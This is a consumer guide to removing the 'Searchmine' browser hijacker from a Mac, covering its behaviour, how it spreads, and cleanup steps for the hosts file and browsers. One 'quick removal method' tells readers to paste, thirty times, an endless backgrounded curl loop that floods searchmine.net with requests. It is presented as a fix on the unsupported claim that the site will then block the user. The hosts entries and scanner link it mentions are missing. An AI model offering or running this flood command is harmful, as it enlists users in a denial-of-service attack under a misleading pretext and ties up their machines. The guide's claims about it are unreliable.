Searchmine is a browser-hijacking website/search engine that forces the browsers of Mac users to reroute their traffic to searchmine.net. If Searchmine isn’t removed on time, it may potentially expose your Mac to Trojans, Spyware, and other threats because it could generate unsafe ads.
Browser hijackers for Mac such as Searchmine are no longer a rarity as they used to be in the past. Currently, Mac users are just as likely to have their browsers hijacked as are people who use Windows PCs. While browser hijacking sites, search engines, apps, and browser extensions pale in comparison to Trojans, Ransomware, or Spyware in terms of how much trouble and harm they could cause, it is not uncommon for a browser hijacker to eventually turn into a gateway for those more dangerous forms of malware that we mentioned. Therefore, if Searchmine (or any other hijacker) is currently in control of your browser(s), it is crucial that you delete the unwanted software and restore the normal settings of your browser. The guide posted below will help you with that, but before we get to it, we wish to share with you some additional information about Searchmine.
What does Searchmine do?
By itself, Searchmine cannot damage your computer or any of the files and software you keep in it. It could cause slow-downs and possible freezes of the browser because of all the system resources it is using to generate its ads and redirects, but that’s about it.
This is because the goal of this app is not to harm anything in the system but to make profits through paid page-redirects and ad-generation. You have probably already noticed how your browsing is frequently getting rerouted to searchmine.net – this is in fact the main task of the undesirable app, and it is how it manages to make money for its creators. If you search for anything using the custom (rogue) Searchmine search engine that has been imposed on your browser, you will likely be rerouted to a list of search results provided by Yahoo or Bing. However, your browser won’t get directly rerouted to the Yahoo or Bing search results page but would instead first go through several intermediate addresses. Since your browser would only go to those addresses for a split second, you will likely not even notice it unless you are looking for it. Those split-second visits to the intermediate addresses, however, register as visits and thus increase the overall traffic to said addresses. Needless to say, the sites your browser gets redirected to before it ends up on the Yahoo or Bing page are neither the safest nor the most reliable. In fact, some of those addresses are from well-known browser-hijacker sites such as Searchbaron or Searchmarquis. Unfortunately, even a split-second visit to such a site may expose your computer to danger and compromise its security. Therefore, you should do everything in your power to get rid of Searchmine, releasing your browser from its control.
Searchmine persistence techniques and distribution methods
If Searchmine has been added to your browser, changing its homepage and adding unwanted extensions to it, and if you have already tried to remove it, you may have found out that you are unable to directly revoke the changes imposed by the hijacker.
This is because the creators of Searchmine have found a way to exploit the built-in enterprise policy features that browsers like Safari and Chrome have in order to make it impossible for the user to directly change any of the settings that have been imposed by the hijacker. In many cases, you will likely see a message that tells you the settings you are trying to change are being “Managed by your organization” and because of this you are not allowed to alter them. You may also see that the hijacker has created its own profiles on your Mac that it uses to impose the browser changes. Examples of such profiles that can be found in systems infected by Searchmine are:
- Safari Settings
- Chrome Settings.
Though this might seem discouraging, there are ways to get around this problem and return your browser(s) to its normal state. In the guide we have prepared for you, we will show you exactly how you will be able to do this on your own.
As far as the distribution methods used to spread Searchmine are concerned, the most common technique is to add the unwanted software to a free app that seems to be safe at first glance (this is called software-bundling). Since the official App Store of Apple has a very strict security policy, the instances of such disguised rogue apps that have found their way into the store are exceedingly rare. That is why it is much more common to find such unwanted applications on third-party platforms so bear this in mind and be very careful when downloading something from outside the store.
Another possible (and much simpler) method used to allow hijacker sites and search engines to establish a foothold in your browser is through notification requests that the site sends you when you visit it for the first time. Often those requests are disguised as something else (for instance as permission to visit the site). To avoid accidentally allowing notifications from a hijacker site/search engine and thus letting it get inside your browser, be very careful whenever a random pop-up shows up on your screen when you enter a given site and if you do not agree with the permission that is required from the site, click on Decline and leave that site.
Spam emails, spam social media messages, and fake update requests are also possible distribution techniques so be on the lookout for those too.
|Danger Level||Medium (nowhere near threats like Ransomware, but still a security risk)|
How to remove Searchmine from Mac
To remove Searchmine from your Mac, you should delete the unwanted entries that the hijacker has added to the computer’s Hosts file:
- Go to Finder from the menu bar and select Applications.
- Go to the Utilities folder and open the Terminal app.
- Type the next command in the Terminal window: sudo nano /private/etc/hosts.
- Pay close attention to the spaces when you type the command.
- Press Enter and if you are asked to provide a password, type the same password that you use to enter the Mac account that you are currently using and press Enter again.
- When you see the Hosts file, copy-paste the following commands in the file (place the commands between the 127.0.0.1 localhost and the 255.255.255.255 broadcasthost lines):
- Once you’ve placed the commands, press Command + O from the keyboard to save the changes you’ve just made in the Hosts file.
- Press Control + X to exit the file and restart your Mac to apply the changes.
If you did everything correctly and if you are lucky, this should be enough to rid you of Searchmine. However, sometimes, symptoms of the hijacker may still be present, in which case you should complete the more advanced removal steps we’ve posted down below in this guide.
How to remove Searchmine from Safari
To remove Searchmine from Safari, you must first see if there are any extensions that the hijacker has added to the browser and remove them.
- Start by opening Safari, selecting its menu from the top, and going to Preferences.
- From Preferences, select Extensions and look at the different extensions installed in the browser.
- If you see a Searchmine extension or anything else that might be linked to the hijacker, uninstall it to remove Searchmine from Safari.
- Check for other potentially unwanted extensions, remove them too, restart the Mac, and enter Safari again to check if everything’s back to normal.
How to get rid of Searchmine
To get rid of Searchmine, you can also try the following quick removal method:
- Go to Finder > Applications > Utilities and open the Terminal app.
- Copy the command shown below and paste it no less than thirty times in the Terminal:
- while true; do curl -s -L –retry 1000 -H ‘Cache-Control: no-cache’ –user-agent Mozilla/5.0 –limit-rate 1k “https://www.searchmine.net/search/?asset=ds&wtguid=27232702344415973&wtmacid=f1e36c6706297c31241eed3bfb229073&wtsrc=4583&wtdt=011620&wtbr=1&wtpl=10.15.2.0&v=6.0&q=34523452389-8392380490485092348539840598234-09582340-958239-485-2390485928340-985239048539840598340-9582390-850239-852398509830958230-95830-9485023-98503909-85029348509385930-59230-59203945023952390-48504239850-23984502349859-850923-489523-9582-394582390-4852390-483995230-94582039850-3348509385930-59230-59203945023952390-48504239850-23984502349859-850923-489523-9582-394582390-4852390-483995230-94582039850-3348509385930-59230-59203945023952390-48504239850-23984502349859-850923-489523-9582-394582390-4852390-483995230-94582039850-3348509385930-59230-59203945023952390-48504239850-23984502349859-850923-489523-9582-394582390-4852390-483995230[1-10000] & ” > /dev/null ; done &
- Hit Enter to execute the multiple instances of the command and wait for the completion of the command – in most cases, this should be enough to get rid of Searchmine.
- Restart the computer, open your browser again and see if the hijacker symptoms are gone.
What executing this command so many times does is it forces the Searchmine site to block your IP because it detects that you are swarming its servers with a big number of requests. Once the Searchmine site blocks your IP, you will no longer get redirected to that site and would no longer receive ads or other aggressive notifications from it. This method technically doesn’t remove Searchmine but it still prevents it from bothering you. Once you are no longer seeing the effects of the hijacker in your browser, you can try the next steps to ensure that any data related to Searchmine gets fully removed from your browser.
- Note that the Terminal command from above would only work as intended if you haven’t already completed the Hosts file editing method we showed you earlier. Both methods seek to complete the same goal and so if editing the Hosts file worked out for you, there’s no need to use the Terminal command method we’ve just showed you.
- Note that in order for the Terminal command method to take effect, you may have to wait for a couple of minutes so don’t worry if it doesn’t work out right away.
Additional Removal Steps
Even if your browser(s) is no longer getting rerouted to Searchmine, this doesn’t mean that the unwanted app is gone from your Mac so it is important to check the system for any remnants of the hijacker and delete what you may find. To do this, please follow the next couple of steps
Step 1: Quit the Searchmine process
- Once more, go to Finder, open Applications > Utilities, and this time start the Activity Monitor app.
- In it, seek a process named Searchmine and if you find such a process, select it and click on the Quit button (an X button in the top-left) to stop the process.
- If there isn’t a process with the Searchmine name, try to find other suspicious entries with odd/unusual/unfamiliar names and high RAM and CPU consumption.
- Since you can’t be sure if the suspected processes are related to Searchmine, it’s best to look up their names on the Internet to find out more about them.
- If your quick research suggests that the process(s) in question could indeed be linked to Searchmine, quit that process too.
- If looking up the process’ name didn’t yield any useful results or if you want further confirmation that the process is probably not supposed to be running in your system, select it in the Activity Monitor, click on the “i” (Information) icon from the top-left, and select Sample from the window that opens.
- Click on Save to save the process sample and save it in an easily reachable location (such as the Desktop).
- Go to the saved Sample file and drag it to the following free online malware scanner to test it for malware:
- If the scan confirms that the sample file contains malware code, you must delete that file, go to the process that you sampled, and quit that process like we showed you above.
- If looking up the process told you that it is likely run by the hijacker, you should quit that process even if the sample file wasn’t detected as dangerous during the malware scan.
Step 2: Delete potentially unwanted apps from your Mac
Most hijackers and other unwanted software or malware for Mac computers get added to the system with the help of free apps that are used to distribute them as built-in components the existence of which is typically unknown to the users. Therefore, it is crucial that you uninstall any such suspicious apps from your computer if you are to fully remove Searchmine from it.
- Go to Finder and select Applications.
- Look for recently installed items that you don’t think you can trust. If there is an app or apps that have been downloaded from sources other than the official App Store, the chances that one of those apps could be responsible for the installation of the hijacker is quite high so bear this in mind.
- Drag to the Trash any suspicious apps that you may have spotted in the Applications folder.
- If there are any apps that you haven’t personally installed and that aren’t pre-installed apps that came with your Mac, delete those too.
- Finally, empty the Trash so that everything potentially unwanted gets fully deleted.
Step 3: Safely start Safari
- To perform a safe-launch of the Safari browser (start the browser without any unwanted pages/sites loading), close the browser if it is open at the moment, hold down Shift, and open it again.
- If you still see that sites from previous browsing sessions load again, you should once more quit the browser and stop your Mac’s connection to the Internet.
- Depending on what type of Internet connection you are using (cable or wireless) you should either plug out the Ethernet cable or go to the Wi-Fi menu and select the Turn off button to temporarily disconnect your Mac from the web.
- After you do that, perform the safe-launch of Safari again.
Step 4: Clean the Safari settings
- Open Safari, go once more to its Extensions page, check for unwanted items again, and remove the ones you think shouldn’t be there.
- Next, go to the browser menu, select Preferences, open Privacy, and there select the Remove All Website Data. Click on Remove Now to execute the command and wait for it to complete.
- Select the General tab from the Preferences options and see if the homepage address has been changed to Searchmine or to anything else without your permission. If it has been, delete the current homepage URL and in its place type the address of a trusted site that will be your new homepage.
- Click on History from the menu bar, select the Clear History option, pick the All History setting, and click on the Clear History button to execute the command.
Step 5: Clean your other browsers
In case you have other browsers on your Mac, you ought to clean them too even if you rarely or never use them. We will give you two examples: with Chrome and with Firefox, on how you can check your other browsers for unwanted software and settings modifications and clean them.
How to clean Chrome
- Start the browser, select the three dots under the X button, go to More Tools, and select Extensions from the submenu.
- Do the absolutely same in the Extensions page like what you did in Safari, deleting all extensions that you think might be unwanted and/or related to Searchmine.
- Open the Chome menu again and this time go to Settings.
- Scroll down and click on the Show advanced settings menu.
- Select the Reset settings to their original defaults to revoke any unwanted changes that Searchmine may have made in the browser.
How to clean Firefox
- After you start the Firefox browser, go to its menu (three horizontal lines in the upper-right corner), and select Add-ons.
- On the Add-ons page, see if there are items that you haven’t installed or that seem unwanted and delete them.
- Open the browser menu again, click on Help, and select Troubleshooting information from the submenu.
- Click on Refresh Firefox on the next page and select the Refresh Firefox button again from the dialogue box that pops-up to confirm the action.